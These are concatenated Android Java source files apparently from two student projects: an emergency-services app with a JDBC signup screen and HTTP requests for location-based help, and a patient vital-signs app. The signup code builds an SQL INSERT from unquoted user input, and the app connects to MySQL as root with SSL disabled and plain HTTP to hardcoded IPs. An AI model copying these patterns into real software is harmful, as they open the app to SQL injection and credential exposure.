bloodgrp = (Spinner) findViewById(R.id.signup_bloodgrp_id);
pb = (ProgressBar)findViewById(R.id.signup_progressbar_id);
signup_button = findViewById(R.id.signup_button_id);
go_login = findViewById(R.id.signup_login_id);
pb.setVisibility(View.GONE);
ip="localhost";
//ip = "172.16.145.218";
// ip = "127.0.0.1";
db = "Emergencydb";
un = "root";
pass = "<PASSWORD>*";
// Spinner click listener
bloodgrp.setOnItemSelectedListener(this);
// Spinner Drop down elements
List<String> categories = new ArrayList<String>();
categories.add("Blood Group");
categories.add("A+");
categories.add("A-");
categories.add("B+");
categories.add("B-");
categories.add("O+");
categories.add("O-");
categories.add("AB+");
categories.add("AB-");
// Creating adapter for spinner
ArrayAdapter<String> dataAdapter = new ArrayAdapter<String>(this, android.R.layout.simple_spinner_item, categories);
// Drop down layout style - list view with radio button
dataAdapter.setDropDownViewResource(android.R.layout.simple_spinner_dropdown_item);
// attaching data adapter to spinner
bloodgrp.setAdapter(dataAdapter);
// signup_button.setOnClickListener(new View.OnClickListener() {
// @Override
// public void onClick(View v) {
// openMainActivity();
// }
// });
signup_button.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v){
CheckSignin checksignin = new CheckSignin();
checksignin.execute("");
}
});
go_login.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
openLoginActivity();
}
});
}
public class CheckSignin extends AsyncTask<String,String,String>{
String z = "";
Boolean is_success = false;
String username_local,password_local,phno_local,bloodgrp_local;
@Override
protected void onPreExecute(){
username_local = name.getText().toString();
password_local = <PASSWORD>.getText().toString();
phno_local = phno.getText().toString();
bloodgrp_local = bloodgrp.getSelectedItem().toString();
pb.setVisibility(View.VISIBLE);
}
@Override
protected String doInBackground(String... params){
if(username_local.trim().equals("")||password_local.trim().equals("")){
z = "Please enter Name or Password";
}
else{
try{
conn = connectionclass(un,pass,db,ip);
if(conn == null){
z = "Connection lost (Check Your Internet)";
}
else{
String query = "INSERT INTO users_client VALUES (0,"+username_local+","+password_local+","+phno_local+","+bloodgrp_local+")";
Statement stmt = conn.createStatement();
try{
stmt.executeUpdate(query);
}
catch (SQLException e){
z = "Name already exists";
return z;
}
}
}
catch(Exception ex){
is_success = false;
z = ex.getMessage();
}
}
return z;
}
@SuppressLint("NewApi")
public Connection connectionclass(String user, String password, String database, String server)
{
StrictMode.ThreadPolicy policy = new StrictMode.ThreadPolicy.Builder().permitAll().build();
StrictMode.setThreadPolicy(policy);
Connection connection = null;
String DB_URL,ConnectionURL;
try
{
Class.forName("com.mysql.jdbc.Driver");
DB_URL = "jdbc:mysql://"+server+":3306/"+database+"?verifyServerCertificate=false&useSSL=false";
// DB_URL = "jdbc:mysql://192.168.43.183:3306/workflowdb?verifyServerCertificate=false&useSSL=false";
System.out.println(DB_URL);
connection = (Connection)DriverManager.getConnection(DB_URL,user,password);
}
catch (SQLException se)
{
se.printStackTrace();
//Log.e("error here 1 : ", se.getMessage());
}
catch (ClassNotFoundException e)
{
Log.e("error here 2 : ", e.getMessage());
}
catch (Exception e)
{
Log.e("error here 3 : ", e.getMessage());
}
return connection;
}
@Override
protected void onPostExecute(String r){
pb.setVisibility(View.GONE);
Toast.makeText(SignupActivity_JDBC.this,r,Toast.LENGTH_SHORT).show();
if(is_success){
Toast.makeText(SignupActivity_JDBC.this,"Signup Successful",Toast.LENGTH_LONG).show();
}
}
}
@Override
public void onItemSelected(AdapterView<?> parent, View view, int position, long id) {
// On selecting a spinner item
String item = parent.getItemAtPosition(position).toString();
// Showing selected spinner item
Toast.makeText(parent.getContext(), "Selected: " + item, Toast.LENGTH_LONG).show();
}
public void onNothingSelected(AdapterView<?> arg0) {
}
public void openMainActivity(){
Intent i = new Intent(this,MainActivity.class);
startActivity(i);
}
public void openLoginActivity(){
Intent i = new Intent(this,LoginActivity.class);
startActivity(i);
}
}
<file_sep>package com.example.emergencyservices;
import androidx.appcompat.app.AppCompatActivity;
import android.content.SharedPreferences;
import android.os.AsyncTask;
import android.os.Bundle;
import android.util.Log;
import android.widget.TextView;
import android.widget.Toast;
import org.json.JSONObject;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.URL;
public class Past_user_detailsActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_past_user_details);
int request_user_id = getIntent().getIntExtra("Request_userid",-1);
String request_address = getIntent().getStringExtra("Request_address");
final int request_id = getIntent().getIntExtra("Request_id",-1);
GetRequestsDetails(request_address,request_user_id);
SharedPreferences sp;
sp = getSharedPreferences("login",MODE_PRIVATE);
final String serviceprovider_name = sp.getString("UserName_service",null);
}
public GetRequestsDetailsConnect gc;
public void GetRequestsDetails(String address,int uid){
gc = new GetRequestsDetailsConnect(address,uid);
gc.execute();
}
public class GetRequestsDetailsConnect extends AsyncTask<String,String,String> {
String address,name_local,phno_local;
int user_id;
GetRequestsDetailsConnect(String a,int uid){
address=a;
user_id=uid;
}
@Override
protected String doInBackground(String... params){
try{
String ip = "172.16.101.50";
// jsonObject = new JSONObject();
String serverURL="http://"+ip+":8080/EmergencyServicesBackend/webapi/resource/get_clientdetails/"+user_id;
URL url = new URL(serverURL);
HttpURLConnection connection = (HttpURLConnection)url.openConnection();
connection.setRequestMethod("GET");
connection.setRequestProperty("Content-Type", "text/plain; charset=UTF-8");
InputStream is = connection.getInputStream();
BufferedReader r = new BufferedReader(new InputStreamReader(is));
StringBuilder total = new StringBuilder();
String line;
while ((line = r.readLine()) != null)
{
total.append(line);
}
is.close();
line = total.toString();
line = line.trim();
System.out.println("line = "+line);
JSONObject jsonObj = new JSONObject(line);
name_local = jsonObj.getString("name");
phno_local = jsonObj.getString("phno");
return line;
}
catch(MalformedURLException e){
e.printStackTrace();
}
catch (IOException e){
e.printStackTrace();
}
catch (Exception e){
e.printStackTrace();
}
return null;
}
@Override
protected void onPostExecute(String s) {
if(s==null){
Log.d("Past_detailsActivity", "Some error has occurred at Server or connection error");
}
else if(s.equals("invalid") || s.equals("user_id is becoming -1")){
Log.e("Past_detailsActivity", "Request cancelled");
Toast.makeText(Past_user_detailsActivity.this,"Request cancelled",Toast.LENGTH_LONG).show();
}
else if(s.equals("Exception")){
Log.e("Past_detailsActivity", "Some error has occurred at Server");
Toast.makeText(Past_user_detailsActivity.this,"Some error has occurred at Server",Toast.LENGTH_LONG).show();
}
else
{
TextView nameText = (TextView) findViewById(R.id.name_serviceprovider_id);
nameText.append(" "+name_local);
TextView addressText = (TextView) findViewById(R.id.address_id);
addressText.append(address);
TextView phnoText = (TextView) findViewById(R.id.phno_serviceprovider_id);
phnoText.append(" "+phno_local);
Log.d("Past_detailsActivity", "Request Succesful");
}
}
@Override
protected void onCancelled() {
gc = null;
}
}
}
<file_sep>package com.example.emergencyservices;
import androidx.annotation.NonNull;
import androidx.appcompat.app.AppCompatActivity;
import android.Manifest;
import android.content.Intent;
import android.content.SharedPreferences;
import android.content.pm.PackageManager;
import android.location.Location;
import android.location.LocationListener;
import android.location.LocationManager;
import android.os.AsyncTask;
import android.os.Build;
import android.os.Bundle;
import android.provider.Settings;
import android.util.Log;
import android.view.View;
import android.widget.Button;
import android.widget.ImageButton;
import android.widget.Toast;
import android.location.Address;
import android.location.Geocoder;
import org.json.JSONObject;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.List;
import java.util.Locale;
import static android.location.LocationManager.*;
public class MainActivity extends AppCompatActivity {
private Button hospital_button;
private Button fire_button;
private ImageButton profile_button;
private LocationManager lm;
private LocationListener ll;
private Location curr_loc;
@Override
protected void onCreate(Bundle savedInstanceState) { // first method which it loads
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
hospital_button = findViewById(R.id.hospital_id);
fire_button = findViewById(R.id.fire_id);
lm = (LocationManager) getSystemService(LOCATION_SERVICE);
ll = new LocationListener() {
@Override
public void onLocationChanged(Location location) {
Log.d("Latitude_Longitude ","Data from the Latitude_Longitude : " + location.getLatitude());
System.out.println("\nLatitude_Longitude " + location.getLatitude() + " " + location.getLongitude());
curr_loc = location;
}
@Override
public void onStatusChanged(String provider, int status, Bundle extras) {
}
@Override
public void onProviderEnabled(String provider) {
}
@Override
public void onProviderDisabled(String provider) {
//What to do if GPS is off
Intent i = new Intent(Settings.ACTION_LOCATION_SOURCE_SETTINGS);
startActivity(i);
}
};
configureButton();
profile_button = findViewById(R.id.profile_page_id);
// profile_button.setOnClickListener(new View.OnClickListener() {
// @Override
// public void onClick(View v) {
// openProfileActivity();
// }
// });
}
@Override
public void onRequestPermissionsResult(int requestCode, @NonNull String[] permissions, @NonNull int[] grantResults) {
switch (requestCode) {
case 10:
if (grantResults.length > 0 && grantResults[0] == PackageManager.PERMISSION_GRANTED)
configureButton();
return;
}
}
private void configureButton() {
hospital_button.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {
if (checkSelfPermission(Manifest.permission.ACCESS_FINE_LOCATION) != PackageManager.PERMISSION_GRANTED && checkSelfPermission(Manifest.permission.ACCESS_COARSE_LOCATION) != PackageManager.PERMISSION_GRANTED) {
requestPermissions(new String[]{Manifest.permission.ACCESS_COARSE_LOCATION,Manifest.permission.ACCESS_FINE_LOCATION,Manifest.permission.INTERNET},
10);
return;
}
}
lm.requestLocationUpdates(LocationManager.GPS_PROVIDER, 1000, 0, ll);
lm.requestLocationUpdates(LocationManager.NETWORK_PROVIDER, 0, 0, ll);
if (curr_loc != null){
getService("Hospital");
}
else
System.out.println("Location fetching is slow");
}
});
fire_button.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {
if (checkSelfPermission(Manifest.permission.ACCESS_FINE_LOCATION) != PackageManager.PERMISSION_GRANTED && checkSelfPermission(Manifest.permission.ACCESS_COARSE_LOCATION) != PackageManager.PERMISSION_GRANTED) {
requestPermissions(new String[]{Manifest.permission.ACCESS_COARSE_LOCATION,Manifest.permission.ACCESS_FINE_LOCATION,Manifest.permission.INTERNET}
,10);
return;
}
}
lm.requestLocationUpdates(GPS_PROVIDER, 1000, 0, ll);
if (curr_loc != null){
getService("Fire");
}
else
System.out.println("Location fetching is slow");
}
});
}
public String getAddress(double lat, double lng) {
Geocoder geocoder = new Geocoder(MainActivity.this, Locale.getDefault());
try {
List<Address> addresses = geocoder.getFromLocation(lat, lng, 1);
Address obj = addresses.get(0);
String add = obj.getAddressLine(0);
// add = add + "," + obj.getCountryName();
// add = add + "," + obj.getCountryCode();
// add = add + "," + obj.getAdminArea();
// add = add + "," + obj.getPostalCode();
// add = add + "," + obj.getSubAdminArea();
// add = add + "," + obj.getLocality();
// add = add + "," + obj.getSubThoroughfare();
// getAdminArea(): returns the state acronym ("CA", for California)
// getCountryCode(): returns the country ISO code ("JP", for Japan)
// getCountryName(): returns country name ("Spain", for... Spain)
// getFeatureName(): returns the name of the location, if any ("Louvre", for the museum)
// getLocality(): returns the city name ("London")
// getPostalCode(): returns the postal code ("94110", in the US)
// getPremises(): ???
// getSubAdminArea(): ???
// getSubLocality(): ???
// getSubThoroughfare(): ???
// getThoroughfare(): returns the street and building number ("1600 Amphitheater Parkway")
Log.d("IGA", "Address" + add);
System.out.println("Address => "+add);
return add;
} catch (IOException e) {
e.printStackTrace();
}
return "Address Not Found";
}
public MainActivity.MainConnect mc;
public void getService(String type){
SharedPreferences sp;
sp = getSharedPreferences("login",MODE_PRIVATE);
System.out.println(curr_loc.getLatitude());
System.out.println(curr_loc.getLongitude());
String latitude_local = String.format("%f",curr_loc.getLatitude());
String longitude_local = String.format("%f",curr_loc.getLongitude());
String username_local = sp.getString("UserName",null);
String address_local = getAddress(Double.parseDouble(latitude_local),Double.parseDouble(longitude_local));
System.out.println("Entered!!");
if(username_local==null){
Toast.makeText(MainActivity.this,"Please login!",Toast.LENGTH_LONG).show();
gotoLogin();
}
else{
mc = new MainActivity.MainConnect(latitude_local,longitude_local,username_local,type,address_local);
mc.execute();
}
}
public class MainConnect extends AsyncTask<String,String,String> {
private String latitude_local,longitude_local,username_local,type,address_local;
MainConnect(String lat,String lon,String un,String t,String a){
latitude_local = lat;
longitude_local = lon;
username_local = un;
type = t;
address_local = a;
}
@Override
protected String doInBackground(String... params){
String res = null;
JSONObject jsonObject = null;
try{
System.out.println("Entered background!!");
String ip = "172.16.101.50";
// 192.168.43.183 - Manonmaie
// 192.168.43.105 - Soumya
// 172.16.145.218 - Milan
jsonObject = new JSONObject();
jsonObject.put("Latitude", latitude_local);
jsonObject.put("Longitude", longitude_local);
jsonObject.put("Name",username_local);
jsonObject.put("Type",type);
jsonObject.put("Address",address_local);
String serverURL="http://"+ip+":8080/EmergencyServicesBackend/webapi/resource/get_service";
URL url = new URL(serverURL);
HttpURLConnection connection = (HttpURLConnection)url.openConnection();
connection.setRequestMethod("POST");
//connection.setRequestProperty("Content-Type", "application/json; charset=UTF-8");
connection.setRequestProperty("Content-Type", "text/plain; charset=UTF-8");
connection.setDoOutput(true);
OutputStream os = connection.getOutputStream();
os.write(jsonObject.toString().getBytes("UTF-8"));
os.close();
int responseCode = connection.getResponseCode();
Log.d("Code", "ResponseCode: " + responseCode);
InputStream is = connection.getInputStream();
BufferedReader r = new BufferedReader(new InputStreamReader(is));
StringBuilder total = new StringBuilder();
String line;
while ((line = r.readLine()) != null)
{
total.append(line);
}
is.close();
line = total.toString();
line = line.trim();
Log.d("MainActivity","Data from the Server: " + line);
res = line;
return res;
}
catch(MalformedURLException e){
e.printStackTrace();
}
catch (IOException e){
e.printStackTrace();
}
catch (Exception e){
e.printStackTrace();
}
return null;
}
@Override
protected void onPostExecute(String s) {
if(s == null)
{
Log.d("MainActivity", "Some error has occurred at Server");
}
else if(s.equals("username or type is null"))
{
Log.e("MainActivity", "username or type is null");
Toast.makeText(MainActivity.this,"username or type is null",Toast.LENGTH_LONG).show();
}
else if(s.equals("No username found"))
{
Log.e("MainActivity", "No username found" );
Toast.makeText(MainActivity.this,"No username found",Toast.LENGTH_LONG).show();
}
else if(s.equals("Address not found")){
Log.e("MainActivity", "Address not found" );
Toast.makeText(MainActivity.this,"Address not found",Toast.LENGTH_LONG).show();
}
else if(s.equals("No requests of you")){
Log.e("MainActivity", "No requests of you" );
Toast.makeText(MainActivity.this,"Some error occured. Try again!!",Toast.LENGTH_LONG).show();
}
else
{
Log.d("MainActivity", "Request sent");
Intent intent = new Intent(MainActivity.this, SearchingActivity.class);
intent.putExtra("request_id",s);
// Bundle basket= new Bundle();
// basket.putString("UserName",username_local);
// intent.putExtras(basket);
startActivity(intent);
// finish();
}
}
@Override
protected void onCancelled() {
mc = null;
}
}
public void gotoLogin(){
Intent intent = new Intent(this,LoginActivity.class);
startActivity(intent);
}
public void openProfileActivity(){
Intent intent = new Intent(this,Profile.class);
startActivity(intent);
}
}
<file_sep>package com.example.emergencyservices;
import androidx.appcompat.app.AppCompatActivity;
import android.os.AsyncTask;
import android.os.Bundle;
import android.util.Log;
import android.widget.TextView;
import android.widget.Toast;
import org.json.JSONObject;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.URL;
public class Requests_serviceproviderDetailsActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_requests_serviceprovider_details);
String id = getIntent().getStringExtra("Service_id");
int service_id = Integer.parseInt(id);
GetServiceRequestsDetails(service_id);
}
public GetServiceRequestsDetailsConnect gc;
public void GetServiceRequestsDetails(int uid){
gc = new GetServiceRequestsDetailsConnect(uid);
gc.execute();
}
public class GetServiceRequestsDetailsConnect extends AsyncTask<String,String,String> {
String address_local,name_local,phno_local;
int user_id;
GetServiceRequestsDetailsConnect(int uid){
user_id=uid;
}
@Override
protected String doInBackground(String... params){
try{
String ip = "172.16.101.50";
// jsonObject = new JSONObject();
String serverURL="http://"+ip+":8080/EmergencyServicesBackend/webapi/resource/get_servicedetails/"+user_id;
URL url = new URL(serverURL);
HttpURLConnection connection = (HttpURLConnection)url.openConnection();
connection.setRequestMethod("GET");
connection.setRequestProperty("Content-Type", "text/plain; charset=UTF-8");
InputStream is = connection.getInputStream();
BufferedReader r = new BufferedReader(new InputStreamReader(is));
StringBuilder total = new StringBuilder();
String line;
while ((line = r.readLine()) != null)
{
total.append(line);
}
is.close();
line = total.toString();
line = line.trim();
System.out.println("line = "+line);
JSONObject jsonObj = new JSONObject(line);
address_local = jsonObj.getString("address");
name_local = jsonObj.getString("name");
phno_local = jsonObj.getString("phno");
return line;
}
catch(MalformedURLException e){
e.printStackTrace();
}
catch (IOException e){
e.printStackTrace();
}
catch (Exception e){
e.printStackTrace();
}
return null;
}
@Override
protected void onPostExecute(String s) {
if(s==null){
Log.d("Request_detailsActivity", "Some error has occurred at Server or connection error");
}
else if(s.equals("invalid") || s.equals("user_id is becoming -1")){
Log.e("Request_detailsActivity", "Request cancelled");
Toast.makeText(Requests_serviceproviderDetailsActivity.this,"Request cancelled",Toast.LENGTH_LONG).show();
}
else if(s.equals("Exception")){
Log.e("Request_detailsActivity", "Some error has occurred at Server");
Toast.makeText(Requests_serviceproviderDetailsActivity.this,"Some error has occurred at Server",Toast.LENGTH_LONG).show();
}
else
{
TextView nameText = (TextView) findViewById(R.id.name_serviceprovider_id);
nameText.append(" "+name_local);
TextView addressText = (TextView) findViewById(R.id.address_id);
addressText.append(address_local);
TextView phnoText = (TextView) findViewById(R.id.phno_serviceprovider_id);
phnoText.append(" "+phno_local);
Log.d("Request_detailsActivity", "Request Succesful");
}
}
@Override
protected void onCancelled() {
gc = null;
}
}
}
<file_sep>include ':app', ':mysql-connector-java-5.1.45'
rootProject.name='EmergencyServices'
| f3b1e92f565e8511a17d34f2df780922ce77624a | [
"Java",
"Gradle"
] | 6 | Java | Manonmaie/EmergencyServices | 42a2542ddc6e9fd61b2b2219e7080385bd1b3cc7 | 6efaaadedf505285edd8e4eebe112b911fb746aa |
refs/heads/master | <repo_name>relwalter/Patient<file_sep>/app/src/main/java/com/patient/AboutUsActivity.java
package com.patient;
import android.content.Intent;
import android.net.Uri;
import android.support.v7.app.ActionBar;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.MenuItem;
import android.view.View;
import android.widget.TextView;
public class AboutUsActivity extends AppCompatActivity {
private TextView mTextView;
private String uriString;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_about_us);
ActionBar actionBar=getSupportActionBar();
actionBar.setDisplayHomeAsUpEnabled(true);
mTextView=(TextView) findViewById(R.id.go_github);
mTextView.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
Intent intent=new Intent();
intent.setAction(Intent.ACTION_VIEW);
uriString="https://"+mTextView.getText().toString().split("//")[1];
intent.setData(Uri.parse(uriString));
startActivity(intent);
}
});
}
@Override
public boolean onOptionsItemSelected(MenuItem item) {
switch (item.getItemId()) {
case android.R.id.home:{
finish();
break;
}
}
return super.onOptionsItemSelected(item);
}
}
<file_sep>/app/src/main/java/com/patient/PatinetSignActivity.java
package com.patient;
import android.content.SharedPreferences;
import android.os.Bundle;
import android.support.design.widget.FloatingActionButton;
import android.support.v7.app.AppCompatActivity;
import android.support.v7.widget.Toolbar;
import android.text.TextUtils;
import android.util.Log;
import android.view.MenuItem;
import android.view.View;
import android.widget.EditText;
import android.widget.ImageView;
import android.widget.TextView;
import android.widget.Toast;
import com.patient.framework.model.Patient;
import com.patient.framework.model.PatientSign;
import com.patient.framework.model.User;
import com.patient.framework.repository.PatientRepository;
import com.patient.framework.repository.PatientSignRepository;
import com.patient.framework.repository.UserRepository;
import java.util.regex.Pattern;
public class PatinetSignActivity extends AppCompatActivity {
int pid;
private String currentRealName,currentHeight,currentWeight,currentTemp,currentBreath,currentPulse,
currentPressure,currentBlsugar,currentMore;
private TextView mrealNameView,mNameEditView,mHeightView,mWeightView,mTempView,mBreathView,mPulseView,
mPressureView,mBlsugarView,mMoreView;
private ImageView mImageView;
private EditText mHeightEditView,mWeightEditView,mTempEditView,mBreathEditView,mPulseEditView,
mPressureEditView,mBlsugarEditView,mMoreEditView;
private FloatingActionButton fab,fab_edit;
private PatientSignRepository patientSignRepository;
private PatientSign patientSign;
private SharedPreferences sharedPreferences;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
sharedPreferences=getSharedPreferences("current",MODE_PRIVATE);
pid=sharedPreferences.getInt("pid",0);
patientSignRepository=new PatientSignRepository(PatinetSignActivity.this);
loadPatientSignView();
}
private void loadPatientSignView(){
setContentView(R.layout.activity_patient_sign);
mrealNameView=(TextView) findViewById(R.id.realname_sign);
mHeightView=(TextView) findViewById(R.id.height_sign);
mWeightView=(TextView) findViewById(R.id.weight_sign);
mTempView=(TextView) findViewById(R.id.temp_sign);
mBreathView=(TextView) findViewById(R.id.breath_sign);
mPulseView=(TextView) findViewById(R.id.pulse_sign);
mPressureView=(TextView) findViewById(R.id.pressure_sign);
mBlsugarView=(TextView) findViewById(R.id.blsugar_sign);
mMoreView=(TextView) findViewById(R.id.more_sign);
setPatientSignView();
Toolbar toolbar=(Toolbar) findViewById(R.id.toolbar_sign);
setSupportActionBar(toolbar);
getSupportActionBar().setDisplayHomeAsUpEnabled(true);
fab = (FloatingActionButton) findViewById(R.id.fab3);
fab.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
loadPatientSignEditView();
}
});
}
private void loadPatientSignEditView(){
setContentView(R.layout.activity_patient_sign_edit);
setPatientSignEditView();
Toolbar toolbar=(Toolbar) findViewById(R.id.toolbar_sign_edit);
setSupportActionBar(toolbar);
getSupportActionBar().setDisplayHomeAsUpEnabled(true);
fab_edit = (FloatingActionButton) findViewById(R.id.fab_sign_edit);
fab_edit.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
if(savePatientSign()){
Toast.makeText(PatinetSignActivity.this,"资料更新成功",Toast.LENGTH_SHORT)
.show();
loadPatientSignView();
}else{
Toast.makeText(PatinetSignActivity.this,
"资料更新失败,请检查后重试",Toast.LENGTH_SHORT).show();
}
}
});
}
@Override
public boolean onOptionsItemSelected(MenuItem item) {
switch (item.getItemId()) {
case android.R.id.home:{
finish();
break;
}
}
return super.onOptionsItemSelected(item);
}
private void setPatientSignView(){
autowireFromDB();
mrealNameView.setText(currentRealName);
mHeightView.setText(currentHeight);
mWeightView.setText(currentWeight);
mTempView.setText(currentTemp);
mBreathView.setText(currentBreath);
mPulseView.setText(currentPulse);
mPressureView.setText(currentPressure);
mBlsugarView.setText(currentBlsugar);
mMoreView.setText(currentMore);
}
private void setPatientSignEditView(){
autowireFromDB();
mNameEditView=(TextView) findViewById(R.id.realname_sign_edit);
mHeightEditView=(EditText) findViewById(R.id.height_sign_edit);
mWeightEditView=(EditText) findViewById(R.id.weight_sign_edit);
mTempEditView=(EditText) findViewById(R.id.temp_sign_edit);
mBreathEditView=(EditText) findViewById(R.id.breath_sign_edit);
mPulseEditView=(EditText) findViewById(R.id.pulse_sign_edit);
mPressureEditView=(EditText) findViewById(R.id.pressure_sign_edit);
mBlsugarEditView=(EditText) findViewById(R.id.blsugar_sign_edit);
mMoreEditView=(EditText) findViewById(R.id.more_sign_edit);
mNameEditView.setText(currentRealName);
mHeightEditView.setText(currentHeight);
mWeightEditView.setText(currentWeight);
mTempEditView.setText(currentTemp);
mBreathEditView.setText(currentBreath);
mPulseEditView.setText(currentPulse);
mPressureEditView.setText(currentPressure);
mBlsugarEditView.setText(currentBlsugar);
mMoreEditView.setText(currentMore);
}
private void autowireFromDB(){
patientSign=patientSignRepository.getPatientSign(pid);
String[] patientSignInfo;
if(patientSign==null){
patientSignInfo=new String[]{"无","无","无","无","无","无","无","无","无","无"};
Toast.makeText(PatinetSignActivity.this,"您还没有录入任何体征信息",Toast.LENGTH_SHORT)
.show();
}else{
patientSignInfo=patientSign.getInfo();
}
currentRealName=sharedPreferences.getString("name","");
currentHeight=patientSignInfo[2];
currentWeight=patientSignInfo[3];
currentTemp=patientSignInfo[4];
currentBreath=patientSignInfo[5];
currentPulse=patientSignInfo[6];
currentPressure=patientSignInfo[7];
currentBlsugar=patientSignInfo[8];
currentMore=patientSignInfo[9];
}
private void autowireFromText(){
currentHeight=mHeightEditView.getText().toString();
currentWeight=mWeightEditView.getText().toString();
currentTemp=mTempEditView.getText().toString();
currentBreath=mBreathEditView.getText().toString();
currentPulse=mPulseEditView.getText().toString();
currentPressure=mPressureEditView.getText().toString();
currentBlsugar=mBlsugarEditView.getText().toString();
currentMore=mMoreEditView.getText().toString();
}
private boolean savePatientSign() {
autowireFromText();
if(attemptSave()){
patientSign=new PatientSign(pid,Float.parseFloat(currentHeight),Float.parseFloat(currentWeight),
Float.parseFloat(currentTemp),Float.parseFloat(currentBreath),
Float.parseFloat(currentPulse), currentPressure,Float.parseFloat(currentBlsugar),
currentMore);
if (!patientSignRepository.checkPatientSign(pid)) {
Log.d("pid",Integer.toString(pid));
if (patientSignRepository.addPatientSignSign(patientSign)==1) {
return true;
}
} else if (patientSignRepository.updatePatientSignSign(patientSign)) {
return true;
}
}
return false;
}
private boolean attemptSave(){
boolean cancel = false;
View focusView = null;
Pattern pattern = Pattern.compile("^[+]{0,1}(\\d+)$|^[+]{0,1}(\\d+\\.\\d+)$");
if (TextUtils.isEmpty(currentHeight)||!pattern.matcher(currentHeight).matches()) {
mHeightEditView.setError("身高格式不正确");
focusView = mHeightEditView;
cancel = true;
}
if (TextUtils.isEmpty(currentWeight)||!pattern.matcher(currentWeight).matches()) {
mWeightEditView.setError("体重格式不正确");
focusView = mWeightEditView;
cancel = true;
}
if(TextUtils.isEmpty(currentTemp)||!pattern.matcher(currentTemp).matches()){
mTempEditView.setError("体温格式不正确");
focusView = mTempEditView;
cancel = true;
}else if (!(Float.parseFloat(currentTemp)>=34 && Float.parseFloat(currentTemp)<=42)){
mTempEditView.setError("温度输入有误");
focusView = mTempEditView;
cancel = true;
}
if(TextUtils.isEmpty(currentBreath)||!pattern.matcher(currentBreath).matches()){
mBreathEditView.setError("格式不正确");
focusView = mBreathEditView;
cancel = true;
}else if (!(Float.parseFloat(currentBreath)>=10 && Float.parseFloat(currentBreath)<=150)){
mBreathEditView.setError("呼吸频率有误");
focusView = mBreathEditView;
cancel = true;
}
if(TextUtils.isEmpty(currentPulse)||!pattern.matcher(currentPulse).matches()){
mPulseEditView.setError("脉搏格式不正确");
focusView = mPulseEditView;
cancel = true;
}else if (!(Float.parseFloat(currentPulse)>=10 && Float.parseFloat(currentPulse)<=150)){
mPulseEditView.setError("脉搏输入有误");
focusView = mPulseEditView;
cancel = true;
}
if(TextUtils.isEmpty(currentBlsugar)||!pattern.matcher(currentBlsugar).matches()){
mBlsugarEditView.setError("血糖浓度格式不正确");
focusView = mBlsugarEditView;
cancel = true;
}else if (!(Float.parseFloat(currentBlsugar)>=2 && Float.parseFloat(currentBlsugar)<=15)){
mBlsugarEditView.setError("血糖浓度有误");
focusView = mBlsugarEditView;
cancel = true;
}
if (!currentPressure.contains("/")) {
mPressureEditView.setError("血压格式有误");
focusView = mPressureEditView;
cancel = true;
}else {
if(TextUtils.isEmpty(currentPressure.split("/")[0])
||TextUtils.isEmpty(currentPressure.split("/")[1])){
mPressureEditView.setError("血压输入有误");
focusView = mPressureEditView;
cancel = true;
}else {
if(!pattern.matcher(currentPressure.split("/")[0]).matches()
||!pattern.matcher(currentPressure.split("/")[1]).matches()) {
mPressureEditView.setError("血压格式有误");
focusView = mPressureEditView;
cancel = true;
}else {
float relPress=Float.parseFloat(currentPressure.split("/")[0]);
float shrPress=Float.parseFloat(currentPressure.split("/")[1]);
if(!(relPress>=10 && relPress<=200)||!(shrPress>=10 && shrPress<=200)){
mPressureEditView.setError("血压输入有误");
focusView = mPressureEditView;
cancel = true;
}
}
}
}
if (cancel) {
focusView.requestFocus();
return false;
}else {
return true;
}
}
}
<file_sep>/app/src/main/java/com/patient/FullscreenActivity.java
package com.patient;
import android.content.Intent;
import android.support.v7.app.ActionBar;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.View;
import android.widget.TextView;
import org.w3c.dom.Text;
public class FullscreenActivity extends AppCompatActivity {
private View mContentView;
private TextView mTextView;
private long endTime;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_fullscreen);
hide();
mContentView = findViewById(R.id.fullscreen_content);
mTextView = (TextView) findViewById(R.id.fullscreen_content_text);
mContentView.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
startActivity(new Intent(FullscreenActivity.this,LoginActivity.class));
finish();
}
});
endTime=System.currentTimeMillis()+3000;
do{
mTextView.setText(Long.toString(Math.round(endTime/1000)));
}while(System.currentTimeMillis()<=endTime);
}
private void hide() {
// Hide UI first
ActionBar actionBar = getSupportActionBar();
if (actionBar != null) {
actionBar.hide();
}
}
}
<file_sep>/app/src/main/java/com/patient/framework/repository/UserRepository.java
package com.patient.framework.repository;
import android.content.Context;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.util.Log;
import com.patient.framework.model.User;
import com.patient.framework.service.DBConnector;
import java.util.ArrayList;
import java.util.List;
public class UserRepository {
private static UserRepository userRepository;
private SQLiteDatabase db;
public UserRepository(Context context){
DBConnector connector=new DBConnector(context);
